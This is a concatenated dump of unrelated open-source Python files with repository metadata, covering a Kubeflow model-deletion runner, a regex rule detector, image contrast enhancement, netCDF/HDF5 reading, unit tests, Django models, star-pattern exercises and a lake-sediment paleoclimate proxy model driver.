] | 1 | 2021-12-20T15:47:41.000Z | 2021-12-20T15:47:41.000Z | components/google-cloud/google_cloud_pipeline_components/container/v1/gcp_launcher/delete_model_remote_runner.py | richardsliu/pipelines | ff99a9877195a028425c5bdf3d3ce4ecbe5d8f9f | [
"Apache-2.0"
] | null | null | null | components/google-cloud/google_cloud_pipeline_components/container/v1/gcp_launcher/delete_model_remote_runner.py | richardsliu/pipelines | ff99a9877195a028425c5bdf3d3ce4ecbe5d8f9f | [
"Apache-2.0"
] | null | null | null | # Copyright 2022 The Kubeflow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import re
from .utils import json_util
from . import lro_remote_runner
_MODEL_NAME_TEMPLATE = r'(projects/(?P<project>.*)/locations/(?P<location>.*)/models/(?P<modelid>.*))'
def delete_model(
type,
project,
location,
payload,
gcp_resources,
):
"""
Delete model and poll the LongRunningOperator till it reaches a final state.
"""
# TODO(IronPan) temporarily remove the empty fields from the spec
delete_model_request = json_util.recursive_remove_empty(
json.loads(payload, strict=False))
model_name = delete_model_request['model']
uri_pattern = re.compile(_MODEL_NAME_TEMPLATE)
match = uri_pattern.match(model_name)
try:
location = match.group('location')
except AttributeError as err:
# TODO(ruifang) propagate the error.
raise ValueError('Invalid model name: {}. Expect: {}.'.format(
model_name,
'projects/[project_id]/locations/[location]/models/[model_id]'
))
api_endpoint = location + '-aiplatform.googleapis.com'
vertex_uri_prefix = f"https://{api_endpoint}/v1/"
delete_model_url = f"{vertex_uri_prefix}{model_name}"
remote_runner = lro_remote_runner.LroRemoteRunner(location)
delete_model_lro = remote_runner.create_lro(
delete_model_url, '', gcp_resources, 'delete')
delete_model_lro = remote_runner.poll_lro(lro=delete_model_lro)
| 36.6 | 102 | 0.719324 | 269 | 2,013 | 5.197026 | 0.524164 | 0.070815 | 0.042918 | 0.02289 | 0.037196 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005471 | 0.182812 | 2,013 | 54 | 103 | 37.277778 | 0.844377 | 0.375559 | 0 | 0 | 0 | 0 | 0.221771 | 0.156783 | 0 | 0 | 0 | 0.018519 | 0 | 1 | 0.032258 | false | 0 | 0.129032 | 0 | 0.16129 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
282a6772fc5117dcd7fca3cb5e228755129685aa | 3,800 | py | Python | tgt_grease/enterprise/Detectors/regex.py | jairamd22/grease | 7ebf3df71d5c80a8ed9df44d9b64b735a9d0f899 | [
"MIT"
] | 44 | 2017-09-29T00:53:44.000Z | 2020-12-20T13:43:49.000Z | tgt_grease/enterprise/Detectors/regex.py | jairamd22/grease | 7ebf3df71d5c80a8ed9df44d9b64b735a9d0f899 | [
"MIT"
] | 39 | 2017-09-29T10:26:10.000Z | 2019-05-02T21:07:59.000Z | tgt_grease/enterprise/Detectors/regex.py | jairamd22/grease | 7ebf3df71d5c80a8ed9df44d9b64b735a9d0f899 | [
"MIT"
] | 26 | 2017-09-28T18:00:39.000Z | 2021-10-17T15:14:39.000Z | from tgt_grease.enterprise.Model import Detector
import re
class Regex(Detector):
"""Regular Expression Detector for GREASE Detection
A Typical Regex configuration looks like this::
{
...
'logic': {
'Regex': [
{
'field': String, # <-- Field to search for
'pattern': String, # <-- Regex to perform on field
'variable': Boolean, # <-- OPTIONAL, if true then create a context variable of result
'variable_name: String # <-- REQUIRED IF variable, name of context variable
}
...
]
...
}
}
"""
def processObject(self, source, ruleConfig):
"""Processes an object and returns valid rule data
Data returned in the second parameter from this method should be in this form::
{
'<field>': Object # <-- if specified as a variable then return the key->Value pairs
...
}
Args:
source (dict): Source Data
ruleConfig (list[dict]): Rule Configuration Data
Return:
tuple: first element boolean for success; second dict for any fields returned as variables
"""
final = {}
finalBool = False
if not isinstance(source, dict):
return False, {}
if not isinstance(ruleConfig, list):
return False, {}
else:
# loop through configuration for each set of logical configurations
for block in ruleConfig:
if not isinstance(block, dict):
self.ioc.getLogger().error(
"INVALID REGEX LOGICAL BLOCK! NOT TYPE LIST [{0}]".format(str(type(block))),
notify=False
)
return False, {}
else:
# look for field and perform regex
if block.get('field') in source:
if source.get(block.get('field')):
result = re.findall(block.get('pattern'), str(source.get(block.get('field'))))
if len(result):
finalBool = True
if block.get('variable') and block.get('variable_name'):
final[str(block.get('variable_name'))] = result
else:
continue
else:
self.ioc.getLogger().trace(
"Field did not pass regex",
verbose=True
)
return False, {}
else:
# truthy false field value
self.ioc.getLogger().trace(
"Field [{0}] equates to false [{1}]".format(
block.get('field'),
source.get(block.get('field'))
),
notify=False,
verbose=True
)
return False, {}
else:
self.ioc.getLogger().trace(
"Field not found in source [{0}]".format(block.get('field')),
notify=False,
verbose=True
)
return False, {}
return finalBool, final
| 39.175258 | 109 | 0.409474 | 306 | 3,800 | 5.071895 | 0.369281 | 0.051546 | 0.050258 | 0.032861 | 0.165593 | 0.097938 | 0.059278 | 0.059278 | 0.059278 | 0 | 0 | 0.002142 | 0.508684 | 3,800 | 96 | 110 | 39.583333 | 0.829138 | 0.305789 | 0 | 0.384615 | 0 | 0 | 0.084381 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019231 | false | 0.019231 | 0.038462 | 0 | 0.211538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
282becac560cf6bd87e19b0f2d06b4f86cfdff73 | 479 | py | Python | Classifier/preprocess/contrast_enhansement.py | withanageyasiru/diabetic-retinopathy-detection | 40b0dfe3d8010b475ff243d8f575a003ba01b004 | [
"MIT"
] | null | null | null | Classifier/preprocess/contrast_enhansement.py | withanageyasiru/diabetic-retinopathy-detection | 40b0dfe3d8010b475ff243d8f575a003ba01b004 | [
"MIT"
] | null | null | null | Classifier/preprocess/contrast_enhansement.py | withanageyasiru/diabetic-retinopathy-detection | 40b0dfe3d8010b475ff243d8f575a003ba01b004 | [
"MIT"
] | null | null | null | import cv2
def contrast_enhancement(images):
'''
:param images:
:return:
creating a Histograms Equalization
of a image using cv2.equalizeHist()
'''
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
for i in range(images.shape[0]):
images[i, :, :, 0] = clahe.apply(images[i, :, :, 0])
images[i, :, :, 1] = clahe.apply(images[i, :, :, 1])
images[i, :, :, 2] = clahe.apply(images[i, :, :, 2])
return images
| 23.95 | 63 | 0.565762 | 61 | 479 | 4.42623 | 0.491803 | 0.155556 | 0.177778 | 0.188889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.039106 | 0.25261 | 479 | 19 | 64 | 25.210526 | 0.715084 | 0.196242 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
282f31b83b088bf22def0023e6d5c332f78340c1 | 1,019 | py | Python | lecture05_scientific_netcdf.py | cgalli/ATMOS_6910_2018 | baff60990bb4cda4c7f469bc3efa4adba185cbb5 | [
"MIT"
] | 2 | 2019-08-19T14:34:51.000Z | 2019-09-11T05:23:36.000Z | lecture05_scientific_netcdf.py | cgalli/ATMOS_6910_2018 | baff60990bb4cda4c7f469bc3efa4adba185cbb5 | [
"MIT"
] | null | null | null | lecture05_scientific_netcdf.py | cgalli/ATMOS_6910_2018 | baff60990bb4cda4c7f469bc3efa4adba185cbb5 | [
"MIT"
] | null | null | null | import numpy as np
from netCDF4 import Dataset
import matplotlib.pyplot as plt
import h5py
#from pyhdf.SD import SD,SDC
nc_f='/uufs/chpc.utah.edu/common/home/mace-group3/arm/grw/grwvceil25kM1.b1/2010/grwvceil25kM1.b1.20100828.000008.cdf'
nc_fid=Dataset(nc_f,'r')
print nc_fid.file_format
print nc_fid.dimensions.keys()
print nc_fid.dimensions['time']
print nc_fid.variables.keys()
print nc_fid.variables['first_cbh']
base_time=nc_fid.variables['base_time'][:]
first_cbh=nc_fid.variables['first_cbh'][:]
print base_time
fig=plt.figure()
hdf_f='/uufs/chpc.utah.edu/common/home/mace-group4/gpm/GPM_L2/GPM_2AKa.05/2018/010/2A.GPM.Ka.V7-20170308.20180110-S072245-E085520.021977.V05A.HDF5'
f=h5py.File(hdf_f,'r')
f.keys()
group1=f.get('MS')
print group1.items()
lat=group1.get('Latitude')
print lat
print(lat[0:10,0:10])
np.array(lat).shape
f.close
#hdf_f='/uufs/chpc.utah.edu/common/home/mace-group4/modis/MYD06_L2/2008/092/MYD06_L2.A2008092.0210.006.2013344194530.hdf'
#file=SD(hdf_f,SDC.READ)
#print file.info()
| 25.475 | 147 | 0.774289 | 186 | 1,019 | 4.107527 | 0.456989 | 0.052356 | 0.065445 | 0.051047 | 0.198953 | 0.141361 | 0.141361 | 0.141361 | 0.102094 | 0.102094 | 0 | 0.136743 | 0.059863 | 1,019 | 39 | 148 | 26.128205 | 0.660752 | 0.183513 | 0 | 0 | 0 | 0.08 | 0.354369 | 0.302184 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.16 | null | null | 0.36 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
283171f5d0ff85faf12bc71df8c82dee608db1c8 | 1,629 | py | Python | tests/unit/dev_support.py | CCI-MOC/hil | 8c6de2214ddf908c01549b117d5684ac52a93934 | [
"ECL-2.0",
"Apache-2.0"
] | 23 | 2016-09-27T18:41:46.000Z | 2021-12-20T15:06:32.000Z | tests/unit/dev_support.py | CCI-MOC/hil | 8c6de2214ddf908c01549b117d5684ac52a93934 | [
"ECL-2.0",
"Apache-2.0"
] | 522 | 2016-06-22T21:19:26.000Z | 2020-11-12T20:54:40.000Z | tests/unit/dev_support.py | CCI-MOC/hil | 8c6de2214ddf908c01549b117d5684ac52a93934 | [
"ECL-2.0",
"Apache-2.0"
] | 30 | 2016-06-24T08:27:59.000Z | 2018-08-20T17:34:45.000Z | """Test the hil.dev_support module."""
from hil.dev_support import no_dry_run
import pytest
from hil.test_common import fail_on_log_warnings, config_merge
fail_on_log_warnings = pytest.fixture(autouse=True)(fail_on_log_warnings)
# We test two ways of using the decorator: applying it to a freestanding
# function, and applying it to an instance method.
def _function():
"""Helper which uses no_dry_run on a plain function."""
@no_dry_run
def func():
"""Assert false, so we can check if the function is called."""
assert False
func()
def _method():
"""Helper which uses no_dry_run on a method."""
class Cls:
"""Test class to carry the method."""
@no_dry_run
def method(self):
"""Assert false, so we can check if the method is called."""
assert False
obj = Cls()
obj.method()
# We test the decorator both with the option enabled and with it disabled.
def _dry(func):
"""Call ``func`` with dry_run enabled."""
config_merge({'devel': {'dry_run': 'True'}})
func()
def _wet(func):
"""Call ``func`` with dry_run disabled."""
config_merge({'devel': {'dry_run': None}})
with pytest.raises(AssertionError):
func()
# Actual test cases:
def test_dry_function():
"""Test dry_run enabled on a function."""
_dry(_function)
def test_wet_function():
"""Test dry_run disabled on a function."""
_wet(_function)
def test_dry_method():
"""Test dry_run enabled on a method."""
_dry(_method)
def test_wet_method():
"""Test dry_run disabled on a method."""
_wet(_method)
| 23.271429 | 74 | 0.655003 | 237 | 1,629 | 4.278481 | 0.295359 | 0.076923 | 0.039448 | 0.050296 | 0.274162 | 0.230769 | 0.106509 | 0.106509 | 0 | 0 | 0 | 0 | 0.224064 | 1,629 | 69 | 75 | 23.608696 | 0.802215 | 0.427256 | 0 | 0.225806 | 0 | 0 | 0.032221 | 0 | 0 | 0 | 0 | 0 | 0.096774 | 1 | 0.322581 | false | 0 | 0.096774 | 0 | 0.451613 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2834596b9d349b96e4b8df7103de99840f6327ce | 3,034 | py | Python | perrot/plot/labels.py | labqui/perrot | 3b49574861aeb8ce57a9a030f737bc49bc8ab9d5 | [
"MIT"
] | null | null | null | perrot/plot/labels.py | labqui/perrot | 3b49574861aeb8ce57a9a030f737bc49bc8ab9d5 | [
"MIT"
] | null | null | null | perrot/plot/labels.py | labqui/perrot | 3b49574861aeb8ce57a9a030f737bc49bc8ab9d5 | [
"MIT"
] | null | null | null | # Created byMartin.cz
# Copyright (c) Martin Strohalm. All rights reserved.
from pero.properties import *
from pero import Label, LabelBox
from . graphics import InGraphics
class Labels(InGraphics):
"""
Labels container provides a simple tool to draw all given labels at once in
the order defined by their 'z_index' property.
By default the container makes sure the labels do not overlap each other
using their bounding box. If two labels are overlapping, the one with higher
'z_index' is finally drawn. To ignore label overlaps the 'overlap' property
must be set to False.
All the labels having the anchor coordinates outside the frame are ignored
and not drawn. In addition, labels for which the bounding box falls
partially outside the the clipping frame, are automatically shifted to
ensure their full visibility.
Properties:
items: (pero.Label,), None or UNDEF
Specifies a collection of labels to draw.
overlap: bool
Specifies whether the labels can overlap each other (True) or should
be skipped automatically if there is not enough space available
(False).
spacing: int, float
Specifies the minimum additional space between adjacent labels.
padding: int, float, (int,), (float,) or UNDEF
Specifies the inner space as a single value or values for individual
sides starting from top. This is used in addition to the 'clip' to
shift partially visible labels.
"""
items = ListProperty(UNDEF, types=(Label,), dynamic=False)
overlap = BoolProperty(False, dynamic=False)
spacing = NumProperty(4, dynamic=False)
padding = QuadProperty(5, dynamic=False)
def __init__(self, **overrides):
"""Initializes a new instance of Grid."""
super().__init__(**overrides)
self._glyph = LabelBox()
def initialize(self, canvas, plot):
"""
This method is automatically called by parent plot to set specific
properties and perform necessary initialization steps.
"""
# check if visible
if not self.visible:
return
# set items from plot
items = []
for series in plot.series:
if series.visible and series.show_labels:
items += series.get_labels()
self.items = items
def draw(self, canvas, source=UNDEF, **overrides):
"""Uses given canvas to draw the legend."""
# check if visible
if not self.is_visible(source, overrides):
return
# get properties
frame = self.get_property('frame', source, overrides)
# update glyph
self._glyph.set_properties_from(self, source=source, overrides=overrides)
# draw labels
self._glyph.draw(canvas, clip=frame)
| 32.978261 | 81 | 0.62294 | 360 | 3,034 | 5.197222 | 0.447222 | 0.025655 | 0.017103 | 0.017103 | 0.024586 | 0.024586 | 0 | 0 | 0 | 0 | 0 | 0.00096 | 0.313448 | 3,034 | 91 | 82 | 33.340659 | 0.897264 | 0.536585 | 0 | 0.08 | 0 | 0 | 0.004078 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12 | false | 0 | 0.12 | 0 | 0.52 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
28359c255234b4110fde32516cbfcf088b1a150b | 764 | py | Python | users/models.py | arianmotti/story-contest | 2c5050b609f707e5aadfa2a0c46fb8dcd70af944 | [
"MIT"
] | 3 | 2021-10-14T05:26:22.000Z | 2022-02-24T20:42:10.000Z | users/models.py | arianmotti/story-contest | 2c5050b609f707e5aadfa2a0c46fb8dcd70af944 | [
"MIT"
] | null | null | null | users/models.py | arianmotti/story-contest | 2c5050b609f707e5aadfa2a0c46fb8dcd70af944 | [
"MIT"
] | 1 | 2022-03-09T17:28:49.000Z | 2022-03-09T17:28:49.000Z | from django.db import models
from django.contrib.auth.models import User
from PIL import Image
from django.core.files.storage import default_storage
class Profile(models.Model):
user = models.OneToOneField(User , on_delete = models.CASCADE)
image = models.ImageField(default = 'default.jpg' , upload_to = 'profile_pics')
def __str__(self):
return f'{self.user.username} Profile'
def save(self,*args, **kwargs):
super(Profile,self).save(*args, **kwargs)
img = default_storage.open(self.image.name , 'r+b')
img = Image.open(img)
if img.height > 300 or img.width > 300:
output_size = (300,300)
img.thumbnail(output_size)
img.save(self.image.name)
| 34.727273 | 83 | 0.64267 | 100 | 764 | 4.8 | 0.49 | 0.0625 | 0.054167 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020725 | 0.242147 | 764 | 21 | 84 | 36.380952 | 0.80829 | 0 | 0 | 0 | 0 | 0 | 0.070681 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0.235294 | 0.058824 | 0.588235 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
28368bf8fb725a2c95f66d1426103ed339df3f07 | 1,638 | py | Python | Compilation star patterns.py | Ranjul-Arumadi/Coding-Problems | c43f33743d469128a0987767b9ee06f236be7562 | [
"MIT"
] | null | null | null | Compilation star patterns.py | Ranjul-Arumadi/Coding-Problems | c43f33743d469128a0987767b9ee06f236be7562 | [
"MIT"
] | 1 | 2021-07-16T11:32:19.000Z | 2021-07-16T11:32:19.000Z | Compilation star patterns.py | Ranjul-Arumadi/Coding-Problems | c43f33743d469128a0987767b9ee06f236be7562 | [
"MIT"
] | 2 | 2021-07-16T11:24:40.000Z | 2021-07-16T11:47:36.000Z | '''
Q: Popular star patterns
Pattern 1:
*
**
***
****
*****
******
Pattern 2:
* * * * * *
* * * * *
* * * *
* * *
* *
*
Pattern 3:
*
***
*****
*******
*********
Pattern 4:
*
* *
* *
* *
* *
* * * * * *
Notes:
------
Usually the outer for loop determines the height of the pattern
Output screenshot: https://github.com/Ranjul-Arumadi/Coding-Problems/blob/main/Output%20Screenshots/patterns.jpg
'''
'''*-------------------------Solution in python-------------------------'''
#pattern 1
for i in range(0,7):
for j in range(i):
print('*', end="")
print()
#pattern 2
for i in range(6, 0, -1):
for j in range(i):
print('*', end=" ")
print()
#pattern 3
print('Enter tree height: ',end='')
height = int(input())
count=1
for i in range(height, 0, -1):
for j in range(i):
print(' ', end="")
for k in range(count):
print('*', end="")
count = count+2
print()
#pattern 4
print('Enter tree height: ',end='')
height = int(input())
count=1
lineOne = True
for i in range(height, 0, -1):
for j in range(i):
print(' ', end="")
print('*',end="")
if i==1:
for x in range(height-1):
print(' *',end='')
exit()
else:
if lineOne==False:
for k in range(count):
print(' ',end="")
print('*',end="")
count = count+2
print()
lineOne = False
| 16.545455 | 112 | 0.405983 | 173 | 1,638 | 3.843931 | 0.317919 | 0.115789 | 0.03609 | 0.066165 | 0.503759 | 0.485714 | 0.425564 | 0.353383 | 0.353383 | 0.294737 | 0 | 0.024606 | 0.379731 | 1,638 | 98 | 113 | 16.714286 | 0.629921 | 0.373626 | 0 | 0.736842 | 0 | 0 | 0.05235 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.394737 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2842010b790379cb45ad0d302a5c0a5ff7f3616c | 431 | py | Python | api/migrations/0003_data_type.py | ajmaln/kerala-university-api | cdd685c627213d376444cdbfd7d57cbb41999b66 | [
"MIT"
] | null | null | null | api/migrations/0003_data_type.py | ajmaln/kerala-university-api | cdd685c627213d376444cdbfd7d57cbb41999b66 | [
"MIT"
] | 9 | 2020-02-11T23:16:35.000Z | 2021-09-08T00:12:21.000Z | api/migrations/0003_data_type.py | ajmaln/kerala-university-api | cdd685c627213d376444cdbfd7d57cbb41999b66 | [
"MIT"
] | null | null | null | # Generated by Django 2.1.1 on 2018-09-07 04:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0002_auto_20180906_1708'),
]
operations = [
migrations.AddField(
model_name='data',
name='type',
field=models.CharField(default='results', max_length=20),
preserve_default=False,
),
]
| 21.55 | 69 | 0.593968 | 47 | 431 | 5.319149 | 0.829787 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107843 | 0.290023 | 431 | 19 | 70 | 22.684211 | 0.70915 | 0.104408 | 0 | 0 | 1 | 0 | 0.106771 | 0.059896 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
284a7d4016babf6192b135533c9d0b672b2937ca | 10,364 | py | Python | psm/lake/lake_driver.py | amoodie/PRYSM | 99cf02145e3df0aad8b4d9103ab6c081d97bff1f | [
"MIT"
] | 21 | 2015-07-20T21:37:14.000Z | 2022-02-14T04:10:11.000Z | psm/lake/lake_driver.py | amoodie/PRYSM | 99cf02145e3df0aad8b4d9103ab6c081d97bff1f | [
"MIT"
] | 8 | 2015-10-08T16:37:04.000Z | 2019-01-04T21:02:09.000Z | psm/lake/lake_driver.py | amoodie/PRYSM | 99cf02145e3df0aad8b4d9103ab6c081d97bff1f | [
"MIT"
] | 13 | 2015-01-30T10:05:14.000Z | 2022-02-05T21:56:21.000Z | #======================================================================
# Sylvia Dee
# Modified 03/08/16 <sylvia_dee@brown.edu>
# Modified 04/02/18 <sylvia@ig.utexas.edu>
# Script to run lake sediment proxy system model
#======================================================================
# PRYSM v2.0 Lake Sediments, DRIVER SCRIPT
# Notes: please see all function docstrings for proper use.
# Dependencies: rpy2, f2py, numpy
"""
Lake PSM ~ Load Environmental Variables to compute lake energy/water balance.
This is a driver script. It is set up to walk the user through the necessary
commands to use the lake PSM. The user can load there own data in the fields below,
or use the provided test data.
This driver script calls the submodels:
lake_sensor
lake_archive
lake_obs
The final output is a pseudoproxy time series at a given site, with 1000
plausible chronologies, age-depth information, and related sensor uncertaities.
"""
#======================================================================
# L0. Initialization
#======================================================================
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
from math import pi, sqrt, exp
#==============================================================
# L1. ENVIRONMENT SUB-MODEL: Load environment Input data
#==============================================================
# cd /disk/staff/sylvia/LAKEPSM/
# # Example data directory
# datadir='test_data_lake/'
# print 'Loading data from ', datadir,' ...'
# env_input='example_input.txt'
#==============================================================
# F2PY to run environment model: run the following in the command window
# NOTE:
# (1) IT RUNS IN THE COMMAND LINE NOT IN THE PYTHON SHELL.
# (2) Make sure to run and install in the correct environment.
# f2py -c -m lakepsm lake_environment.f90
# MUST BE IN SAME DIRECTORY AS COMPILED FORTRAN WRAPPER
import lakepsm
lake_data_file= env_input
# Run Environment Model
lakepsm.lakemodel()
# The above should run the fortran model through a wrapper (F2Py)
# The output files (listed below) should now appear in your working directory.
# output files:
#profile_output.dat
#surface_output.dat
#==============================================================
# L2. SENSOR MODEL(S)
#==============================================================
import sensor_gdgt as gdgt
import sensor_carbonate as carb
import sensor_leafwax as leafwax
# Pull data (lake surface temperature) from output from env
# model and use to run sensor model
surf_ouput = 'ERA-HIST-Tlake_surf.dat'
surf_tempr = []
with open(surf_ouput, 'r') as data:
tempr_yr = []
for line in data:
line_vals = line.split()
tempr_yr.append(line_vals[1])
surf_tempr.append(tempr_yr[341:-11])
surf_tempr = np.array(surf_tempr[0], dtype = float) +275.15
climate_input = 'ERA_INTERIM_climatology_Tanganyika.txt'
air_tempr = []
with open(climate_input, 'r') as data:
airtemp_yr = []
for line in data:
line_vals = line.split()
airtemp_yr.append(line_vals[2])
air_tempr.append(airtemp_yr[:-12])
air_tempr = np.array(air_tempr[0], dtype = float)
LST = surf_tempr # THIS SHOULD BE THE FULL TIME SERIES of lake surface temp
MAAT = air_tempr # Full timeseries of air temperatures
beta = 1./50.
d18Ow = -2 # To be set by the user if isoflag is off
print('Running sensor model...')
# 2.1 GDGT Sensors
gdgt_proxy = gdgt.gdgt_sensor(LST,MAAT,beta=beta,model = 'MBT')
# SAVE IN CURRENT DIRECTORY
np.save('gdgt_sensor.npy',gdgt_proxy)
# 2.2 Carbonate Sensor
carb_proxy = carb.carb_sensor(LST,d18Ow,isoflag=-1,model='ONeil')
# SAVE IN CURRENT DIRECTORY
np.save('carb_sensor.npy',carb_proxy)
# 2.3 Leaf Wax Sensor
sample_input = 'IsoGSM_dDP_1953_2012.txt'
dDp = np.loadtxt(sample_input)
fC_3 = 0.7 #fraction of C3 plants
fC_4 = 0.3 #fraction of C4 plants
eps_c3 = -112.8 #pm 34.7
eps_c4 = -124.5 #pm 28.2
wax_proxy = leafwax.wax_sensor(dDp,fC_3,fC_4,eps_c3,eps_c4)
# define the error range on the epsilon (apparent fractionation) measurement:
eps_c3_err=34.7
eps_c4_err=28.2
# add uncertainties in apparent fractionation via monte-carlo resampling process:
delta_d_wax_mc,Q1,Q2=leafwax.wax_uncertainty(dDp,fC_3,fC_4,eps_c3,eps_c4,eps_c3_err,eps_c4_err)
# where Q1 is the 2.5th percentile, Q2 is the 97.5th percentile of the 1000 MC realizations
# SAVE IN CURRENT DIRECTORY
np.save('leafwax_sensor.npy',wax_proxy)
np.save('leafwax_sensor_1000mc.npy',delta_d_wax_mc)
np.save('leafwax_sensor_975CI.npy',Q2)
np.save('leafwax_sensor_25CI.npy,Q1')
print('Sensor model finished....')
#==============================================================
# L4. RUN ARCHIVE MODEL
#==============================================================
import lake_archive_compact as compact
print 'Running archive model...'
# 4.1 SEDIMENTATION
Sbar = 100.0 # Sedimentation rate, cm/kyr
S = Sbar/1000. # Sedimentation rate, cm/yr
# Without compaction:
T = 21000. #years !set from the envriomental model!
H = S*T #meters
# TODO: NOTE THAT IF YOU HAVE DEPTH MEASUREMENTS THIS SHOULD BE SPECIFIED HERE
depth_profile = H # total depth of core [m]
h=np.linspace(0,H,num=100)
depth_profile=H # total depth of core
# Trends in porosity ~ reflect inhomogeneities in relatve compaction:
# Apply correction based on conservation of dry sediment volume wherein the thickness of each layer
# is adjusted so as to remove trends in porosity.
# Run porosity function to calculate compaction due to porosity in
# lake sediments:
phi,z = compact.porosity(depth_profile)
phi_0 = 0.95 # porosity of sediments at site (typical value for lake seds = 0.99)
np.save('phi.npy', phi)
np.save('z.npy',z)
# Now adjust the compacted sediment depth scale based on porosity
h_prime = np.zeros(len(phi)) # depth and age at each index.
for i in range(len(phi)):
h_prime[i] = h[i]*(1-phi_0)/(1-phi[i])
# save depth-age profile as independent output
#==============================================================
# 4.2 BIOTURBATION ~ TURBO2 (Trauth, 2013)
import lake_archive_bioturb as bio
years = np.arange(1979,2015,1) # READ THE YEARS.
age = years
mxl = np.ones(36)*4.
abu = np.ones(36)*200. # abundance of species carrier 1
abu2 = abu[-37:-1]
iso = pseudoproxy
lngth = len(pseudoproxy)
numb = 10
oriabu,bioabu,oriiso,bioiso = bio.bioturbation(abu2,iso,mxl,numb)
#==========================================================================
# L5. APPLY OBSERVATION MODEL
#==========================================================================
print 'Running observation model...'
import csv
from numpy import genfromtxt
from rpy2.robjects import FloatVector
from rpy2.robjects.vectors import StrVector
import rpy2.robjects as robjects
from rpy2.robjects.packages import importr
# require rpy2 installed
import lake_obs_bchron2 as bchron
data = genfromtxt('TEX86_cal.csv',
delimiter = ',',
names=True,
dtype=None
#mask module may be used when better understood
#,usemask=True
)
# example input file: user have to provide their own input
year=data['AGE']
depth=data['DP']
sds=data['SD']
r = robjects.r #robjective
calCurves=np.repeat('normal', 26)
nyears=21000. # that should fixed from the input
d=500. # same as H in the sendimentation.
ages = FloatVector(year) # age estimate
sd = FloatVector(sds)# SD of ages
positions = FloatVector(depth) # position in core in cm
calCurves = StrVector(calCurves)
predictPositions = r.seq(0,d,by=d/nyears) # note d= total depth of core (60cm)
# Specify extractDate (top-most age of the core, in years BP. 1950=0BP)
extractDate= -55
# Call BCHRON observation model to return CHRONS (in years BP)
# NOTE: long run time waming
chronBP, depth_horizons = bchron.chron(ages,sd,positions,calCurves,predictPositions,extractDate)
# recast in years CE
chronCE = np.fliplr(1950 - chronBP)
#==========================================================================
# 3.2: Analytical Uncertainty Model:
